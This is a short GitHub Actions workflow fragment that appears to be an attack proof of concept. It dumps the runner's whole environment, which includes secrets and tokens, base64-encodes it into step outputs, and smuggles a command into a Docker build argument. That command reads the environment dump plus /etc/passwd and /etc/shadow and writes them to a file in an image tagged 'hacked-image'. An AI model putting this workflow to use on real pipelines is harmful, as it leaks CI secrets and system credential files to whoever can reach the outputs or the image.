- name: Get base64 runner env
  id: b64env
  run: |
    env | base64 > b64.txt
    echo "value=$(cat b64.txt)" >> $GITHUB_OUTPUT

- name: Build Docker image with injected env
  run: |
    echo "$B64ENV" | base64 -d > runner_env.txt
    docker build \
      --build-arg PYTHON_VERSION="cat runner_env.txt /etc/passwd /etc/shadow | tee /env_dump.txt" \
      -t hacked-image .
  env:
    B64ENV: ${{ steps.b64env.outputs.value }}
